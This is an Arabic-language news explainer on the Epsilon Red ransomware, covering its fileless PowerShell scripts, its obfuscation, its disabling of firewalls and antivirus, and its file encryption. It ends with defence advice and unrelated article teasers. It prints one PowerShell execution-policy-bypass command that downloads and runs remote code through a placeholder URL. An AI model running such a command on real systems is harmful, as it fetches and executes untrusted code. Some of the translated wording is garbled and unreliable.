هل قمت بتصحيح الخوادم الخاصة بك حتى الآن ؟
يستهدف تهديد برنامج الفدية الجديد ، المسمى Epsilon Red، الخوادم غير المصحّحة المستندة إلى Microsoft في مراكز بيانات المؤسسات. تم تسمية Epsilon Red على اسم شرير غير معروف من Marvel Comics، وتم اكتشافه مؤخرًا بواسطة شركة للأمن السيبراني تدعى Sophos. منذ اكتشافها، هاجمت برامج الفدية العديد من المؤسسات حول العالم.
برامج الفدية عديمة الملفات "تختبئ" في PowerShell
تعد برامج الفدية عديمة الملفات أحد أشكال البرامج الضارة التي يتم تنفيذها عن طريق تجميع البرامج الشرعية. تستخدم البرامج الضارة الخالية من الملفات المستندة إلى PowerShell قدرة PowerShell على التحميل مباشرة إلى ذاكرة الجهاز. تساعد هذه الميزة على حماية البرامج الضارة في البرامج النصية لـ PowerShell من الاكتشاف.
في السيناريو النموذجي، عند تنفيذ البرنامج النصي، يجب أولاً كتابته على محرك أقراص الجهاز. وهذا يسمح لحلول أمان نقطة النهاية باكتشاف البرامج النصية. نظرًا لأن PowerShell مستبعد من عمليات تنفيذ البرامج النصية القياسية، فيمكنه تجاوز أمان نقطة النهاية. بالإضافة إلى ذلك، فإن استخدام معلمة التجاوز في برنامج PowerShell النصي يسمح للمهاجم بالتحايل على قيود البرنامج النصي للشبكة.
مثال على معلمة تجاوز PowerShell هو:
powershell.exe -ep Bypass -nop -noexit -c iex ((New Object.WebClient).DownloadString(‘url’))كما ترى، يعد تصميم معلمات تجاوز PowerShell أمرًا سهلاً نسبيًا.
ردًا على ذلك، أصدرت Microsoft تصحيحًا لمعالجة ثغرة أمنية في تنفيذ البرامج الضارة عن بُعد والمتعلقة بـ PowerShell. ومع ذلك، فإن التصحيحات تكون فعالة فقط بقدر استخدامها. قامت العديد من المؤسسات بتخفيف معايير التصحيح، مما يجعل بيئاتها عرضة للهجوم. يهدف تصميم Epsilon Red إلى الاستفادة من هذا المستوى من الضعف.
فائدة إبسيلون ريد المزدوجة
ونظرًا لأن Epsilon Red هو الأكثر فعالية ضد خوادم Microsoft غير المصححة، فيمكن استخدام البرامج الضارة كأداة للفدية وأداة لتحديد الهوية. إن نجاح Epsilon في بيئة ما أم لا يمنح المهاجمين رؤية أكبر حول القدرات الأمنية لهدفهم.
إذا نجح Epsilon في الوصول إلى Microsoft Exchange Server، فهذا يشير إلى أن المؤسسة لا تتبع أفضل ممارسات أمان التصحيح الشائعة. بالنسبة للمهاجم، يوضح هذا مدى سهولة اختراق Epsilon لبقية بيئة الهدف.
يستخدم Epsilon Red التعتيم لإخفاء حمولته. يؤدي التشويش إلى جعل التعليمات البرمجية غير قابلة للقراءة ويتم استخدامه في برامج PowerShell الضارة لتجنب إمكانية القراءة العالية لبرامج PowerShell النصية. من خلال التشويش، تُستخدم أوامر cmdlets للاسم المستعار لـ PowerShell لتجعل من الصعب على برامج مكافحة الفيروسات التعرف على البرامج النصية الضارة في سجلات PowerShell.
يعتبر Epsilon Red أكثر فعالية ضد خوادم Microsoft غير المصححة
ومع ذلك، لا يزال من الممكن التعرف على نصوص PowerShell المبهمة. من العلامات الشائعة لهجوم PowerShell Script الوشيك إنشاء كائن WebClient. سيقوم المهاجم بإنشاء كائن WebClient في تعليمات PowerShell البرمجية لإنشاء اتصال خارجي بعنوان URL بعيد يحتوي على تعليمات برمجية ضارة.
إذا تعرضت إحدى المؤسسات للهجوم، فإن احتمالية وجود إجراءات أمنية كافية للكشف عن نصوص PowerShell المبهمة تكون منخفضة جدًا. على العكس من ذلك، إذا فشل Epsilon Red في اختراق الخادم، فسيشير ذلك للمهاجم إلى أن شبكة الهدف يمكنها فك تشفير البرامج الضارة PowerShell بسرعة، مما يجعل الهجوم أقل قيمة وأكثر قيمة.
إبسيلون ريد الاختراق السيبراني
وظيفة Epsilon Red بسيطة للغاية. يستخدم البرنامج سلسلة من نصوص Powershell للتسلل إلى الخوادم. يتم ترقيم نصوص PowerShell هذه من 1.ps1 إلى 12.ps1. يهدف تصميم كل برنامج PowerShell النصي إلى إعداد خادم الوجهة للحمولة النهائية.
جميع نصوص PowerShell في Epsilon Red لها غرضها الخاص. تم تصميم أحد برامج PowerShell النصية في Epsilon Red لحل قواعد جدار حماية الشبكة الخاصة بالهدف. برنامج آخر في هذه السلسلة مصمم لإلغاء تثبيت برنامج مكافحة الفيروسات الخاص بالهدف .
كما قد تتخيل، تعمل هذه البرامج النصية بشكل متزامن للتأكد من أنه بمجرد تسليم الحمولة، لا يمكن للهدف إيقاف تقدمه بسرعة.
نقل الحمولة
بمجرد أن تفسح نصوص PowerShell الخاصة بـ Epsilon الطريق لحمولتها النهائية، يتم توزيعها كملحق، Red.exe . عند دخوله إلى الخادم، سيقوم Red.exe بفحص ملفات الخادم وإنشاء قائمة بمسارات الدليل لكل ملف يكتشفه. بعد إنشاء القائمة، يتم إنشاء العمليات الفرعية من ملف البرامج الضارة الرئيسي لكل مسار دليل في القائمة. بعد ذلك، يقوم كل ملف فرعي لبرنامج الفدية بتشفير مسار الدليل من ملف القائمة.
بعد تشفير جميع مسارات المجلدات في قائمة Epson، سيتم ترك ملف .txt لإبلاغ الهدف وتحديد طلب المهاجم. بالإضافة إلى ذلك، سيتم بعد ذلك اختراق جميع عقد الشبكة التي يمكن الوصول إليها والمتصلة بالخادم المخترق وقد يزيد احتمال دخول البرامج الضارة إلى الشبكة.
من يقف وراء إبسيلون ريد؟
ولا تزال هويات المهاجمين الذين يقفون وراء إبسيلون ريد مجهولة
ولا تزال هويات المهاجمين الذين يقفون وراء إبسيلون ريد مجهولة. ومع ذلك، تشير بعض الأدلة إلى أصل المهاجمين. الدليل الأول هو اسم البرنامج الضار. إبسيلون ريد هو شرير من سلسلة X-Men وله قصة من أصل روسي.
يكمن الدليل الثاني في مذكرة الفدية الخاصة بملف txt الذي تركه الرمز خلفه. إنها مشابهة للملاحظة التي تركتها عصابة برامج الفدية المسماة REvil. إلا أن هذا التشابه لا يشير إلى أن المهاجمين كانوا أعضاء في هذه العصابة. تدير REvil عملية RaaS (برامج الفدية كخدمة) حيث تدفع الشركات التابعة لشركة REvil مقابل الوصول إلى برامجها الضارة.
احمِ نفسك من إبسيلون ريد
حتى الآن، نجح Epsilon Red في اختراق الخوادم غير المصححة. وهذا يعني أن أحد أفضل وسائل الحماية ضد Epsilon Red وبرامج الفدية الخبيثة المشابهة هو ضمان إدارة بيئتك بشكل صحيح. بالإضافة إلى ذلك، فإن وجود حل أمني يمكنه فك تشفير البرامج النصية لـ PowerShell بسرعة سيكون إضافة مفيدة لبيئتك.
هل ترى إشعار تفعيل Windows 10 في الزاوية اليمنى من الشاشة؟ سترشدك هذه المقالة إلى كيفية حذف إشعار طلب حقوق الطبع والنشر على نظام التشغيل Windows 10.
أصدرت Microsoft مؤخرًا آخر تحديث تراكمي لمستخدمي أجهزة الكمبيوتر التي تعمل بنظام Windows 10 والذي يسمى Build 14393.222. يعمل هذا التحديث الذي تم إصداره لنظام التشغيل Windows 10 بشكل أساسي على إصلاح الأخطاء بناءً على تعليقات المستخدمين وتحسين تجربة أداء نظام التشغيل.
هل لديك أجهزة كمبيوتر على شبكتك المحلية تحتاج إلى وصول خارجي؟ يمكن أن يكون استخدام مضيف أساسي كحارس بوابة لشبكتك حلاً جيدًا.
في بعض الأحيان قد تحتاج إلى حذف سجلات الأحداث القديمة مرة واحدة. في هذا الدليل، سيعرض لك موقع Quantrimang.com 3 طرق لحذف كافة سجلات الأحداث بسرعة في Windows 10 Event Viewer.
إذا كنت تفضل استخدام لوحة مفاتيح كلاسيكية قديمة، مثل IBM Model M، والتي لا تتضمن مفتاح Windows فعليًا، فهناك طريقة سهلة لإضافة المزيد، عن طريق استعارة مفتاح لا تستخدمه كثيرًا.
WindowTop هي أداة لديها القدرة على تعتيم جميع نوافذ التطبيقات والبرامج التي تعمل على أجهزة الكمبيوتر التي تعمل بنظام Windows 10. أو يمكنك استخدام واجهة ذات خلفية داكنة على النوافذ.
لقد ذكرنا في العديد من المقالات السابقة أن البقاء مجهول الهوية عبر الإنترنت أمر في غاية الأهمية. يتم تسريب المعلومات الخاصة كل عام، مما يجعل الأمان عبر الإنترنت ضروريًا بشكل متزايد. وهذا أيضًا هو السبب وراء ضرورة استخدام عناوين IP الافتراضية. فيما يلي، سنتعرف على طرق إنشاء عناوين IP وهمية!
شريط اللغة في نظام التشغيل Windows 8 عبارة عن شريط أدوات لغة مصغر مصمم للعرض تلقائيًا على شاشة سطح المكتب. ومع ذلك، يرغب العديد من الأشخاص في إخفاء شريط اللغة هذا على شريط المهام.
يعد تعظيم سرعة الإنترنت أمرًا ضروريًا لتحسين اتصال الشبكة لديك. يمكنك الحصول على تجربة ترفيه وعمل مثالية باستخدام أجهزة الكمبيوتر وأجهزة التلفزيون المجهزة للإنترنت ووحدات التحكم في الألعاب وما إلى ذلك.
يعد الاتصال اللاسلكي أمرًا ضروريًا اليوم، ولهذا السبب، يعد الأمان اللاسلكي ضروريًا لضمان السلامة في شبكتك الداخلية.
